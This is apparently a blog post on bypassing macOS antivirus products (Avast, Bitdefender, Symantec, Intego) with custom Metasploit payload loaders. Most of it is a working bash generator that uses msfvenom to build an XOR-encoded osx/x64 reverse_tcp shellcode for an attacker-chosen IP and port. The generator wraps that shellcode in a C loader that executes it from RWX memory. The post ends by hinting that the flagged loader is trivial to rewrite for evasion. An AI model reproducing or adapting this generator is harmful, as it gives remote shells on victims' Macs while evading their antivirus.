Decided to upgrade the MacOS in my VirtualBox to High Sierra and do some testing using customized Metasploit payload loaders there.
Installed the https://www.avast.com/free-mac-security and tested the generators from last year (I was not expecting the results to bypass this AV actually :)) and as expected, the bypass from last year gets picked up now. ( https://astr0baby.wordpress.com/2017/07/13/bypassing-antivirus-on-osx-10-11-with-metasploit-avast/)
What is super-cool nowadays on MacOS is that when you run gcc in the terminal it will automatically prompt you to install the Xcode stuff from Apple, so this time I have used the following
So I went up to build my loaders and all the payloads no matter what get flagged now by Avast
And I started to wonder why …
My original code looked like this ->
clear
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For OSX 64bit Antivirus bypass (Avast) "
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo '[*] Checking if metasploit msfvenom is present..'
if [ -x ./msfvenom ]; then
echo '[*] Found msfvenom in current path ........ good'
else
echo '[-] No msfvenom in path...make sure you have this script in your metasploit-framework path'
exit 0
fi
echo '[*] Cleaning up '
rm -f osx64-payload.c
./msfvenom -p osx/x64/dupandexecve/reverse_tcp EXITFUNC=process LHOST=$IP LPORT=$port -a x64 --platform OSX -e x64/xor -f c -o test.c
echo "#include <stdio.h>" > temp.c
echo '#include <sys/types.h>' >> temp.c
echo '#include <sys/ipc.h>' >> temp.c
echo '#include <sys/msg.h>' >> temp.c
echo '#include <string.h>' >> temp.c
echo '#include <sys/mman.h>' >> temp.c
echo '#include <fcntl.h>' >> temp.c
echo '#include <sys/socket.h>' >> temp.c
echo '#include <stdlib.h>' >> temp.c
echo '#include <errno.h>' >> temp.c
echo '#include <sys/mman.h>' >> temp.c
echo '#include <sys/types.h>' >> temp.c
echo '#include <sys/stat.h>' >> temp.c
echo '#include <sys/ioctl.h>' >> temp.c
echo '#include <unistd.h>' >> temp.c
echo '#include <strings.h>' >> temp.c
echo '#include <unistd.h>' >> temp.c
echo '#include <poll.h>' >> temp.c
echo '#include <pthread.h>' >> temp.c
echo '#include <stdint.h>' >> temp.c
echo '' >> temp.c
cat test.c >> temp.c
echo '' >> temp.c
echo 'int main(int argc, char **argv)' >> temp.c
echo '{' >> temp.c
echo 'void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);' >> temp.c
echo 'printf("ret: 0x%x",ptr);' >> temp.c
echo 'memcpy(ptr,buf,sizeof buf);' >> temp.c
echo 'void (*fp)() = (void (*)())ptr;' >> temp.c
echo 'fp();' >> temp.c
echo '' >> temp.c
echo '}' >> temp.c
mv temp.c osx64-payload.c
if [ -f ./osx64-payload.c ]; then
echo '[*] osx64-payoad.c generated ...'
ls -la osx64-payload.c
else
echo '[-] Something went wrong .. '
exit 0
fi
And once I have put the generated (On Linux) source code to the MacOS and compiled it via gcc it got flagged immediately.
Whats interesting is that no matter what is in the unsigned char/signed char stuff it gets flagged anyway as you can see in the screenshot here
So Avast seems to be tagging only the int main part obviously, as it does not even try do see what the shellcode does …. any bogus stuff can be there … so now comes a 5 cent question … how hard is it to re-write the loader ? :)
Hint .. about 5 seconds ?
Same goes for Bitdefender for MacOS
And Symantec AV
And Intego Mac Internet Security X9